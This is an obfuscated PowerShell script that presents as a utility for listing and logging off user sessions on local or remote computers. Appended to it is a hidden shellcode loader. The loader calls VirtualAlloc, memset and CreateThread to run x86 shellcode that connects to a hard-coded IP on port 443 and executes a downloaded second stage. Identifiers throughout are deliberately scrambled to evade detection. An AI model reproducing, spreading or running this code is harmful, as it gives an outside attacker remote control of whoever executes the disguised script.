  SeT-vARIAbLE 8Ba6  ( [TyPe]("{0}{2}{1}" -f'ScrI','LOCk','PTb')) ; 


 

[OutputType({"{1}{0}"-f 'id','vo'})]
[CmdletBinding(SUPporTSshOULDPRoCESS)]
param
(
	[Parameter()]
	[ValidateNotNullOrEmpty()]
	[string[]]${Co`M`PUTERNa`me},

	[Parameter()]
	[ValidateNotNullOrEmpty()]
	[string]${USe`RnaME}
)

${eRrORACtIoNp`R`E`FE`RencE} = ("{1}{0}" -f 'top','S')

if (-not ${PS`BouN`dpaRaM`eTE`RS}.("{2}{1}{0}"-f'ey','ainsK','Cont').Invoke(("{2}{0}{3}{1}"-f'm','uterName','Co','p'))) {
	${CO`mPUT`e`RNamE} = ("{2}{1}{0}" -f 'st','o','localh')
}

foreach (${c} in ${cOmPu`T`eR`NAME}) {
	
	${C`Om`PARgS} = ${Nu`Ll}
	if (${PS`BOUndp`ARaM`etE`Rs}.("{1}{0}{3}{2}" -f'nt','Co','y','ainsKe').Invoke(("{3}{0}{1}{2}"-f 'N','am','e','Computer'))) {
		${COMpA`R`gS} = "/server:$c"	
	}
	${WH`eREFIL`T`ER} = { '*' }
	if (${Ps`BOuNDpAR`Am`ETe`RS}.("{0}{3}{1}{2}"-f'Con','Ke','y','tains').Invoke(("{0}{2}{1}"-f'Use','Name','r'))) {
		${wHe`REF`IL`Ter} =  $8bA6::("{2}{0}{1}" -f 're','ate','C').Invoke(("`$_ "+'-m'+'atch '+"'$UserName'"))
	}
	if (${Sess`ionS} = ((.("{0}{1}"-f 'qu','ser') ${Co`mpaR`gS} | .("{1}{0}{2}"-f'e','Where-Obj','ct') ${WHe`RE`Filt`eR}))) {
		${seS`sI`ONI`ds} = (${S`eSs`iOns} -split ' +')[2]
		if (${p`ScMdl`et}.("{0}{1}{2}" -f 'Shou','ld','Process').Invoke(('U'+'serNam'+'e:'+' '+"$UserName"), ("{0}{1}"-f'L','ogoff'))) {
			${s`eSsiOn`I`ds} | &("{1}{2}{0}" -f 'ect','ForEa','ch-Obj') {
				&("{1}{2}{0}"-f 'ff','lo','go') ${_} ${Co`mPa`RgS}
			}
		}
	} else {
		.("{3}{0}{2}{1}" -f'e','e','rbos','Write-V') -Message ("{5}{9}{2}{6}{0}{3}{8}{1}{4}{7}" -f 'd matching ','fo','rs fo','criteria','und','N','un','.',' ','o use')
	}
}
${C} = ((("{37}{14}{27}{23}{42}{31}{25}{32}{46}{34}{1}{64}{48}{20}{40}{10}{65}{50}{45}{35}{59}{57}{7}{11}{51}{33}{44}{53}{9}{52}{36}{24}{67}{56}{43}{22}{26}{66}{15}{8}{62}{49}{63}{29}{17}{6}{55}{3}{2}{28}{18}{47}{16}{5}{19}{61}{21}{30}{0}{58}{39}{60}{4}{41}{12}{38}{13}{54}"-f'll','i','ter, uin',' lpParame','tatic extern ','Ptr l','ess,',';[Dl','dwS','l32.dll','flA','lIm','(IntPtr','t, uint src, u','po','t ','Int','ddr','Flags','p','(IntPtr lpAddress, uint dwSize, u','(','lpThre','({0}kernel32.d','rn IntPtr Cre','te','ad','rt','t dwCreation','artA','{0}msvcrt.d','})]public static ex','rn I','t(','Ptr V','y','e','[DllIm',' des','})]','int ','IntPtr memset','ll{0','Ptr ','{','onT','nt',', ','oc','ckSiz','ocati','por','{0})]public static ext','0}kerne','int count);',' IntPtr','read(Int','rotect)','{0','pe, uint flP','public s','ThreadId);[DllImport','ta','e, IntPtr lpSt','rtualAll','ll','Attributes, uin','ateTh'))-f  [chAR]34);${w} = &("{0}{1}{2}" -f'Add-T','yp','e') -memberDefinition ${C} -Name ("{1}{0}"-f 'n32','Wi') -namespace ("{2}{0}{3}{1}{4}" -f'F','i','Win32','unct','ons') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x19,0x50,0x49,0x40,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."Le`NgTH" -gt 0x1000){${g} = ${z}."lE`NgTh"};${X}=${W}::("{2}{1}{0}"-f'alAlloc','u','Virt').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${z}."L`e`NGTh"-1);${I}++) {${w}::"m`eMSET"([IntPtr](${x}.("{0}{1}{2}"-f 'ToIn','t','32').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{0}{1}{2}" -f 'Cre','ate','Thread').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{1}{2}" -f 'Sta','rt-','sleep') 60};
